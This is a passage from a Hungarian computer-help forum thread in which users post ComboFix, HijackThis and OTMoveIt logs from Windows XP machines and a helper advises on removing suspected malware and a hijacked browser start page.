2009-05-29 19:17 . 2008-11-01 09:45 47360 -c--a-w c:\documents and settings\Rendszergazda\Application Data\pcouffin.sys
2009-05-29 19:17 . 2008-11-01 09:45 47360 -c--a-w c:\documents and settings\Rendszergazda\Application Data\pcouffin.sys
2009-05-29 19:16 . 2008-11-01 09:41 -------- d-----w c:\program files\ApexDC++
2009-05-29 19:05 . 2008-11-02 19:43 -------- d-----w c:\program files\Maxthon2
2009-05-29 19:04 . 2008-11-01 09:42 -------- d-----w c:\program files\FlashGet
2009-05-29 13:06 . 2008-11-02 19:44 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\MxBoost
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\clauth2.dll
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\clauth1.dll
2009-04-23 15:56 . 2009-04-23 15:56 1025 ----a-w c:\windows\system32\sysprs7.dll
2009-04-23 15:56 . 2009-04-23 15:56 -------- d-----w c:\documents and settings\All Users\Application Data\hps
2009-04-23 15:51 . 2009-04-23 15:51 -------- d-----w c:\program files\Rossmann
2008-06-28 10:57 . 2008-11-01 09:45 6602240 ----a-w c:\program files\mplayercHC.exe
2008-06-28 10:25 . 2008-11-01 09:45 400896 -c--a-w c:\program files\mpcresources.hu.dll
2008-06-12 17:21 . 2008-11-01 09:42 4341760 ----a-w c:\program files\mplayerc.exe
2008-01-13 19:00 . 2008-11-01 09:23 545792 -csha-w c:\windows\system32\RunOnceEx.exe
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2007-10-18 5724184]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2008-10-24 1451264]
"Alternative RunOnceEx by Ruby Software"="c:\windows\system32\RunOnceEx.exe" [2008-01-13 545792]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"AfterPost"="c:\windows\afterpost2.cmd" [2008-08-07 1388]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoStrCmpLogical"= 1 (0x1)
"ForceCopyAclwithFile"= 0 (0x0)

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"NoStrCmpLogical"= 1 (0x1)
"ForceCopyAclwithFile"= 0 (0x0)

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32
"MIDI1"= SYNCOR11.DLL

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Indítópult^Logitech Desktop Messenger.lnk]
path=c:\documents and settings\All Users\Start Menu\Programs\Indítópult\Logitech Desktop Messenger.lnk
backup=c:\windows\pss\Logitech Desktop Messenger.lnkCommon Startup
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Cmaudio
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Component Manager
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LDM
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MsnMsgr

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"c:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=

R2 ekrn;Eset Service;c:\program files\ESET\ESET Smart Security\ekrn.exe [2008.10.24. 20:51 468224]
.
Contents of the 'Scheduled Tasks' folder

2009-05-30 c:\windows\Tasks\HP Usg Daily.job
- c:\program files\Hewlett-Packard\{D946675D-1D6C-4dc8-9E0D-B4B8EAA30EAA}\pexpress\hphped05.exe [2004-01-07 05:05]
.
- - - - ORPHANS REMOVED - - - -

SafeBoot-procexp90.Sys
MSConfigStartUp-CTFMON - (no file)


.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.wxpee.hu/
uInternet Connection Wizard,ShellNext = hxxp://www.wxpee.hu/
uSearchURL,(Default) = hxxp://www.google.com/keyword/%s
IE: &Google Search - c:\program files\Google\GoogleToolbar1.dll/cmsearch.html
IE: Backward Links - c:\program files\Google\GoogleToolbar1.dll/cmbacklinks.html
IE: Cached Snapshot of Page - c:\program files\Google\GoogleToolbar1.dll/cmcache.html
IE: E&xportálás a Microsoft Excel programba - c:\progra~1\MICROS~1\Office12\EXCEL.EXE/3000
IE: Similar Pages - c:\program files\Google\GoogleToolbar1.dll/cmsimilar.html
IE: Translate into English - c:\program files\Google\GoogleToolbar1.dll/cmtrans.html
DPF: Microsoft XML Parser for Java - file:///C:/WINDOWS/Java/classes/xmldso.cab
FF - ProfilePath - c:\documents and settings\Rendszergazda\Application Data\Mozilla\Firefox\Profiles\w74b2vbb.default\
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava11.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava12.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava13.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava14.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava32.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjpi160.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npoji610.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-05-30 20:41
Windows 5.1.2600 Szervizcsomag 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(764)
c:\windows\system32\sfc_os.dll
.
Completion time: 2009-05-30 20:43
ComboFix-quarantined-files.txt 2009-05-30 18:43

Pre-Run: 5 190 135 808 bájt szabad
Post-Run: 5 226 016 768 bájt szabad

185


szomb. máj. 30, 2009 19:54
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
:D
majd meglasuk mit mutat a combofix

Idézet:
Toldsle ezt a combofixett ted az ASZTALRA,mindent bezarsz kapcsold ki a ha van akorr a Spyware Terminator pajzat es +SpybotTeaTimer pajzat is ha van., .Nemfuthatt semmi program,Futatod mint rendszergazda rendesen Windowsba-2x-klik ikona combofix>beleegyezes......
Es mostan csak nezni fogod nembabralni semmitt a gepp sajatt maga restartoll befejezi a scent ,csinall combofix .txt,eztett ide teszed es
http://download.bleepingcomputer.com/sUBs/ComboFix.exe


szomb. máj. 30, 2009 19:11
Profil Privát üzenet küldése Honlap
platina tag
Avatar

Csatlakozott: szer. márc. 24, 2004 13:43
Hozzászólások: 595
Hozzászólás 
Szia Stell!

Ismét egy gép, melyen próbálom telepíteni a Final Uninstall-t a gyári exefájlból, és sosem engedi feltelepíteni, hanem az ESET Smart Sec menet közben ordít, hogy is-UQK9M.tmp egy New Heur_PE vírus, törléssel megtisztítva, karanténba helyezve. Aztán ujraindítás után egy másik tmp fájlt jelzett, szintén New Heur_PE vírust.

Itt egy HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 19:10:31, on 2009.05.30.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.20815)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\ESET\ESET Smart Security\egui.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ESET\ESET Smart Security\ekrn.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wxpee.hu/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.wxpee.hu/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Daytona 2008 FINAL
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - (no file)
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET Smart Security\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [Alternative RunOnceEx by Ruby Software] "C:\WINDOWS\system32\RunOnceEx.exe" /R
O4 - HKLM\..\RunOnce: [Alternative RunOnceEx by Ruby Software] "C:\WINDOWS\system32\RunOnceEx.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'HELYI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-19\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'HELYI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'HÁLÓZATI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-20\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'HÁLÓZATI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'Default user')
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xportálás a Microsoft Excel programba - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 3676175593
O17 - HKLM\System\CCS\Services\Tcpip\..\{E2F5D8C7-99B5-4740-942B-200D813F14EB}: NameServer = 84.2.44.1 84.2.46.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET Smart Security\ekrn.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech Inc. - c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 5855 bytes

Mit tegyek?


szomb. máj. 30, 2009 18:19
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
ok,nincsen mitt koszonod
futasd az OTMOVEIT programot es klik-Cleanup-yes,,


vas. máj. 24, 2009 15:36
Profil Privát üzenet küldése Honlap
ezüst tag

Csatlakozott: csüt. jún. 21, 2007 10:27
Hozzászólások: 92
Hozzászólás 
Sikerült megcsinálni! A Rendszergazdáknak teljes hozzáférést kellett adni a HKEY_CLASSES_ROOT kulcshoz. Köszi a segítséget, mostmár teljesen jó a gép!


vas. máj. 24, 2009 14:49
Profil Privát üzenet küldése
ezüst tag

Csatlakozott: csüt. jún. 21, 2007 10:27
Hozzászólások: 92
Hozzászólás 
========== PROCESSES ==========
Process explorer.exe killed successfully.
========== FILES ==========
File/Folder C:\WINDOWS\system32\*.tmp.dll not found.
File/Folder C:\WINDOWS\system32\SET*.tmp not found.
C:\WINDOWS\002761_.tmp moved successfully.
C:\WINDOWS\SET21.tmp moved successfully.
C:\WINDOWS\SET22.tmp moved successfully.
C:\WINDOWS\SET23.tmp moved successfully.
C:\WINDOWS\SET24.tmp moved successfully.
C:\WINDOWS\SET25.tmp moved successfully.
C:\WINDOWS\SET26.tmp moved successfully.
C:\WINDOWS\SET27.tmp moved successfully.
C:\WINDOWS\SET28.tmp moved successfully.
C:\WINDOWS\SET29.tmp moved successfully.
C:\WINDOWS\SET2A.tmp moved successfully.
C:\WINDOWS\SET2B.tmp moved successfully.
C:\WINDOWS\SET2C.tmp moved successfully.
C:\WINDOWS\SET2D.tmp moved successfully.
C:\WINDOWS\SET2E.tmp moved successfully.
C:\WINDOWS\SET2F.tmp moved successfully.
C:\WINDOWS\SET3.tmp moved successfully.
C:\WINDOWS\SET30.tmp moved successfully.
C:\WINDOWS\SET31.tmp moved successfully.
C:\WINDOWS\SET32.tmp moved successfully.
C:\WINDOWS\SET33.tmp moved successfully.
C:\WINDOWS\SET34.tmp moved successfully.
C:\WINDOWS\SET35.tmp moved successfully.
C:\WINDOWS\SET36.tmp moved successfully.
C:\WINDOWS\SET37.tmp moved successfully.
C:\WINDOWS\SET38.tmp moved successfully.
C:\WINDOWS\SET39.tmp moved successfully.
C:\WINDOWS\SET3A.tmp moved successfully.
C:\WINDOWS\SET3B.tmp moved successfully.
C:\WINDOWS\SET3C.tmp moved successfully.
C:\WINDOWS\SET3D.tmp moved successfully.
C:\WINDOWS\SET4.tmp moved successfully.
C:\WINDOWS\SET8.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB1.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB2.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB3.tmp moved successfully.
C:\WINDOWS\system32\CONFIG.TMP moved successfully.
C:\WINDOWS\system32\Com\COM3C0.tmp moved successfully.
File move failed. C:\WINDOWS\temp\ZLT0719b.TMP scheduled to be moved on reboot.
C:\WINDOWS\twain_32\hpqgnds2.tmp moved successfully.
File move failed. C:\WINDOWS\system32\h323log.txt scheduled to be moved on reboot.
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}\\ not found.
========== COMMANDS ==========
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\AcrA03.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\JETCAC7.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo386 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo387 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo388 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo389 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo390 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo391 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo392 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo393 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo394 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo395 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo396 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo397 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo398 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo399 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo400 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo401 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo402 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo403 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo404 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo405 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo406 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo407 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo408 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo409 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo410 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo411 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo412 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo413 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo414 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo415 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo416 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo417 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C3F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C55.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF677F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFCFF3.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFD009.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFF81F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~ROMFN_00000F50 scheduled to be deleted on reboot.
User's Temp folder emptied.
User's Internet Explorer cache folder emptied.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
User's Temporary Internet Files folder emptied.
Local Service Temp folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
Local Service Temporary Internet Files folder emptied.
Network Service Temp folder emptied.
Network Service Temporary Internet Files folder emptied.
File delete failed. C:\WINDOWS\temp\KeyFocusKFWSMMFile.txt scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\Perflib_Perfdata_7d4.dat scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\ZLT0719b.TMP scheduled to be deleted on reboot.
Windows Temp folder emptied.
Java cache emptied.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\cache4\opr07CG2 scheduled to be deleted on reboot.
Opera cache emptied.
Temp folders emptied.
Explorer started successfully

OTMoveIt3 by OldTimer - Version 1.0.11.0 log created on 05232009_205657

Files moved on Reboot...
File C:\WINDOWS\temp\ZLT0719b.TMP not found!
C:\WINDOWS\system32\h323log.txt moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\AcrA03.tmp not found!
